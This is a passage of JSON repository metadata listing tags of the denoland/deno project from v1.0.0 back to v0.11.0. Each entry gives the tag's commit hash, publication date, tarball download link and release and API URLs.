deno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z"